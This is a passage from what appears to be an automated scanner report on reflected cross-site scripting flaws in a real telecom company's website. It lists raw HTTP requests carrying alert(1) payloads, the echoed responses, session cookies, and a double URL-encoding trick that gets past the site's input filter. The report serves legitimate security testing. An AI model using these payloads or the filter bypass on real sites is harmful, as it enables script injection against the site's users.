o8cCBhbGlnbj0ibGVmdCI%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGEgUmVzaWRlbnRpYWwgQ3VzdG9tZXIsIHBsZWFzZSBjb250YWN0IDEtODAwLTkyMS04MTAxIG9yIHZpc2l0IHRoZSA8L3NwYW4%2BPGEgdGl0bGU9IlJlc2lkZW50aWFsIENvbnRhY3QgVXMgcGFnZSIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iIHRhcmdldD0iX3NlbGYiPjxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BUmVzaWRlbnRpYWwgQ29udGFjdCBVcyBwY
WdlPC9zcGFuPjwvYT7CoDxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BdG8gcmVhY2ggQ3VzdG9tZXIgU2VydmljZS48L3NwYW4%2BPC9kaXY%2BPC9saT4NCjxwIGFsaWduPSJsZWZ0Ij48c3BhbiBzdHlsZT0iQ09MT1I6ICNmZjAwMDAiPjwvc3Bhbj48L3A%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj48L3NwYW4%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGFuIEFnZW50L1BhcnRuZXIgb2YgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgYW5kIG5lZWQgYXNzaXN0YW5jZSB3aXRoIHlvdXIgTG9naW4sIHBsZWFzZSBjb250YWN0IDEtODY2LTc0NS05MTIyLjwvc3Bhbj48L2Rpdj48L2xpPg0KPHA%2BPC9wPjwvdWw%2BZGQCDQ8PFgIfAmhkZAIRD2QWAmYPFgIfAAXQGTxkaXYgY2xhc3M9ImZvb3RlciI%2BDQogICAgPGRpdiBjbGFzcz0iZm9vdGVyLXNlY3Rpb25zIj4NCiAgICAgICAgPGRpdiBpZD0iaGVscFN1cHBvcnQiPg0KICAgICAgICAgICAgPHVsPg0KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0iZm9vdGVyX2hlYWRpbmdzIj5IZWxwICZhbXA7IFN1cHBvcnQgPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvY3VzdG9tZXJzZXJ2aWNlLyI%2BQ29udGFjdCBGcm9udGllcjwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvYmlsbGluZy8iPkJpbGxpbmcgJmFtcDsgUGF5bWVudCBJbmZvcm1hdGlvbjwvYT4NCiAgICAgICAgICAgICAgICA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9jYXJyaWVyZnJlZXplLyI%2BUHJvdGVjdCBZb3VyIEFjY291bnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL3JldGFpbHN0b3Jlcy8iPkxvY2F0ZSBSZXRhaWwgU3RvcmVzPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Imh0dHA6Ly93d3cuZnJvbnRpZXJoZWxwLmNvbS90ZWNoc3VwcG9ydCI%2BVGVjaG5pY2FsDQogICAgICAgICAgICAgICAgICAgIFN1cHBvcnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICA8L3VsPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBjbGFzcz0iQm90dG9tX3NwYWNlciI%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGlkPSJwcm9ncmFtcyI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPlF1aWNrIExpbmtzPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSJodHRwczovL2Zyb250aWVyLmdsb2J5c29ubGluZS5
jb20vY3Yvc2NyaXB0cy9BQkUwL2VuZy9sb2cuYXNwP2dydT00Mzc2NjI5MTAmYW1wO3NlYz0iPg0KICAgICAgICAgICAgICAgICAgICBCdXNpbmVzcyBPbmxpbmUgQmlsbCBQYXk8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2ZyaWVuZGxpbmsvIj5DdXN0b21lciBSZWZlcnJhbDwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvZG9uYXRlLyI%2BR3JlYXQgRnJvbnRpZXIgRG9uYXRlPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9kaXNjb3VudHByb2dyYW1zLyI%2BRGlzY291bnQgUHJvZ3JhbXM8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9hZHZlcnRpc2UvIj5BZHZlcnRpc2Ugd2l0aCBVczwvYT4gPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJCb3R0b21fc3BhY2VyIj4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgaWQ9ImFib3V0Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BQWJvdXQgVXM8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvY29ycG9yYXRlX2NvbW11bmljYXRpb25zLyI%2BQ29ycG9yYXRlIENvbW11bmljYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9jb3Jwb3JhdGUuZnJvbnRpZXIuY29tL2RlZmF1bHQuYXNweD9tPTUmYW1wO3A9NDMiPkNhcmVlcnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL3BoeC5jb3Jwb3JhdGUtaXIubmV0L3Bob2VuaXguemh0bWw%2FYz02NjUwOCZhbXA7cD1pcm9sLWlyaG9tZSI%2BSW52ZXN0b3INCiAgICAgICAgICAgICAgICAgICAgUmVsYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9waHguY29ycG9yYXRlLWlyLm5ldC9waG9lbml4LnpodG1sP2M9NjY1MDgmYW1wO3A9aXJvbC1uZXdzJmFtcDtueW89MCI%2BDQogICAgICAgICAgICAgICAgICAgIFByZXNzIFJvb208L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL2ZhY2VzX29mX2Zyb250aWVyIj5GYWNlcyBvZiBGcm9udGllcjwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgY2xhc3M9IkJvdHRvbV9zcGFjZXIiPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGVnYWxSZWd1bGF0b3J5Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BTGVnYWwgJmFtcDsgUmVndWxhdG9yeTwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9wb
2xpY2llcy8iPlBvbGljaWVzICZhbXA7IE5vdGlmaWNhdGlvbnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvdGVybXMvIj5UZXJtcyBhbmQgQ29uZGl0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvd2hvbGVzYWxlLyI%2BV2hvbGVzYWxlICZhbXA7IENhcnJpZXIgU2VydmljZXM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2NhcnJpZXIuZnJvbnRpZXJjb3JwLmNvbS9jcnRmL3RhcmlmZnMvaW5kZXguY2ZtP2Z1c2VhY3Rpb249bWFpbiZhbXA7c2N0bklEPTE5Ij4NCiAgICAgICAgICAgICAgICAgICAgVGFyaWZmczwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxwIGNsYXNzPSJjbGVhciI%2BDQogICAgICAgIDwvcD4NCiAgICAgICAgPGRpdiBpZD0iZm9vdGVyQ3JlZGl0cyI%2BDQogICAgICAgICAgICA8ZGl2Pg0KICAgICAgICAgICAgICAgIDxzdHJvbmc%2BJmNvcHk7MjAxMSBGcm9udGllciBDb21tdW5pY2F0aW9ucyBDb3Jwb3JhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC48L3N0cm9uZz4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPCEtLQk8aW1nIHN0eWxlPSJmbG9hdDogcmlnaHQ7IiB3aWR0aD0iMzM5cHgiIGhlaWdodD0iMzdweCIgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL3Bob25lX2NvcHkucG5nIiAgLz4tLT4NCiAgICAgICAgPC9kaXY%2BDQogICAgPC9kaXY%2BDQo8L2Rpdj5kAhMPFgIfAAWJITxicj4KPCEtLU1hcmt1cCBmb3IgSW5pdGlhbCBPdmVybGF5IHRoYXQgY2Fubm90IGJlIGNsb3NlZCB3aXRob3V0IHN1Ym1pdHRpbmcgcGhvbmUvemlwLS0%2BCjxkaXYgaWQ9Im92ZXJTY3JlZW4iPiZuYnNwOzwvZGl2Pgo8ZGl2IGlkPSJvdmVybGF5SW5pdGlhbEZvcm0iIGNsYXNzPSJvdmVybGF5Ij4KICAgIDxpbWcgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL2dyYWRpZW50Qm94LnBuZyIgaGVpZ2h0PSIyNjMiIHdpZHRoPSI2NDAiPgogICAgPGRpdiBjbGFzcz0ib3ZlcmxheUlubmVyIj4KICAgICAgICA8aDE%2BSGVsbG8hPC9oMT4KICAgICAgICA8cD5UbyBwcm92aWRlIHlvdSB3aXRoIHByb2R1Y3RzIGFuZCBzZXJ2aWNlcyB0aGF0IGJlc3QgbWVldCB5b3VyIG5lZWRzLCB3ZSBuZWVkIHRvIGtub3cgeW91ciBsb2NhdGlvbi4gVGhpcyBpbmZvcm1hdGlvbiBpcyBrZXB0IHByaXZhdGUhPC9wPgogICAgICAgIDxmb3JtIG5hbWU9ImZGb3JtMSIgYWN0aW9uPSIjIiBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICA8ZGl2IGlkPSJlcnJvckZpZWxkMSIgY2xhc3M9Im92ZXJsYXlFcnJvciI%2BUGxlYXNlIGVudGVyIGEgdmFsaWQgcGhvbmUgbnVtYmVyIG9yIHppcCBjb2RlLjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUxpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvc
j0icGhvbmUiPlBob25lIE51bWJlcjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUZpZWxkIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUFmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUEiIG5hbWU9InBob25lTnVtQSIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQicpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAxIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUJmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUIiIG5hbWU9InBob25lTnVtQiIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQycpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAyIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUNmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjQiIGlkPSJwaG9uZU51bUMiIG5hbWU9InBob25lTnVtQyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgZm91ci1kaWcgcDMiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBMaW5lIj4KICAgICAgICAgICAgICAgICAgICA8bGFiZWw%2Bb3IgWmlwIENvZGU8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQxIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJzdWJtaXRMaW5lIj48aW5wdXQgaWQ9Im92ZXJsYXlTdWJtaXQiIHZhbHVlPSIiIHR5cGU9InN1Ym1pdCI%2BPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJuZXdiaWUiIHR5cGU9ImNoZWNrYm94Ij4KICAgICAgICAgICAgICAgICAgICA8bGFiZWwgaWQ9Im5ld2JUZXh0IiBmb3I9Im5ld2JpZSI%2BQ2hlY2sgaGVyZSBpZiB5b3UgYXJlIGEgbmV3IGN1c3RvbWVyLjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgPC9mb3JtPgogICAgPC9kaXY%2BCjwvZGl2Pgo8IS0tTWFya3VwIGZvciAgT3ZlcmxheSB0aGF0IGNhbiBiZSBjbG9zZWQgd2l
0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVybGF5Rm9ybSIgY2xhc3M9Im92ZXJsYXkiPgogICAgPGltZyBhbHQ9IiIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZ3JhZGllbnRCb3gucG5nIiBoZWlnaHQ9IjI2MyIgd2lkdGg9IjY0MCI%2BCiAgICA8ZGl2IGNsYXNzPSJvdmVybGF5SW5uZXIiPgogICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJjbG9zZU92ZXJsYXkiPkNMT1NFPC9hPgogICAgICAgIDxoMT5IZWxsbyE8L2gxPgogICAgICAgIDxwPlRvIHByb3ZpZGUgeW91IHdpdGggcHJvZHVjdHMgYW5kIHNlcnZpY2VzIHRoYXQgYmVzdCBtZWV0IHlvdXIgbmVlZHMsIHdlIG5lZWQgdG8ga25vdyB5b3VyIGxvY2F0aW9uLiBUaGlzIGluZm9ybWF0aW9uIGlzIGtlcHQgcHJpdmF0ZSE8L3A%2BCiAgICAgICAgPGZvcm0gbmFtZT0iZkZvcm0yIiBhY3Rpb249IiMiIG1ldGhvZD0icG9zdCI%2BCiAgICAgICAgICAgIDxkaXYgaWQ9ImVycm9yRmllbGQyIiBjbGFzcz0ib3ZlcmxheUVycm9yIj5QbGVhc2UgZW50ZXIgYSB2YWxpZCBwaG9uZSBudW1iZXIgb3IgemlwIGNvZGUuPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InBob25lTGluZSI%2BCiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJwaG9uZSI%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%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcExpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0iIiBpZD0iemlwSW5wdXQyIiBjbGFzcz0iZGVwdGhJbnB1dCB6aXAiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0Q2hhbmdlIiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjaGVja0xpbmUiPgogICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9Im5ld2JpZSIgdHlwZT0iY2hlY2tib3giPgogICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KPC9kaXY%2BCmRkCei%2FS%2FmrhIn%2FFNx89jqMRuohsfs%3D&hfPageType=1&hfRecord_Type=Category&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtUsername=&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtPassword=&ctl00%24ctl00%24FOBasePH%24ContentPH%2
4btnLogin=%C2%BB+Log+In+&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DAgentOrdering%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522ctl00%252524ct%2526oidt%253D2%2526ot%253DSUBMIT

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43516


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/AgentOrdering/Logind2920'-alert(1)-'00fe8bd6112a72257/Default.aspx');//]]>
...[SNIP]...

2.95. https://www.frontier.com/BillPay/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd8c'-alert(1)-'1c3c38ca197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPay2cd8c'-alert(1)-'1c3c38ca197/Login.aspx HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPay2cd8c'-alert(1)-'1c3c38ca197/Login.aspx');//]]>
...[SNIP]...

2.96. https://www.frontier.com/BillPay/Login.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a67f'%3balert(1)//b430a9201a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a67f';alert(1)//b430a9201a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPay/Login.aspx?3a67f'%3balert(1)//b430a9201a2=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 60490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/BillPay/Login.aspx?3a67f';alert(1)//b430a9201a2=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.97. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc153'-alert(1)-'4c0b46131a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Controlsbc153'-alert(1)-'4c0b46131a0/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43410


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/Controlsbc153'-alert(1)-'4c0b46131a0/VirtualCode.ashx');//]]>
...[SNIP]...

2.98. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f651%2527%253balert%25281%2529%252f%252f40ebae18800 was submitted in the REST URL parameter 2. This input was echoed as 7f651';alert(1)//40ebae18800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Controls/VirtualCode.ashx7f651%2527%253balert%25281%2529%252f%252f40ebae18800?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/AgentOrdering/Login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
